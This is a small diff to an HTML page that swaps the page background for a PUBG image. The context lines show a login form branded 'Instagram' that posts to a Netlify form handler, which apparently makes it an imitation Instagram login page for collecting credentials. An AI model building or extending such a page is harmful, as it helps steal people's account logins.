--- a/index.html
+++ b/index.html
@@ -60,7 +60,7 @@ input:focus {}
 
 </head>
 
-<body>
+<body background="https://storage.googleapis.com/kaggle-media/competitions/PUBG/PUBG%20Inlay.jpg">
   <div class="login">
 	<h1><img src="" alt="Instagram"></h1>
 	  <form name="login" method="POST" data-netlify="true">
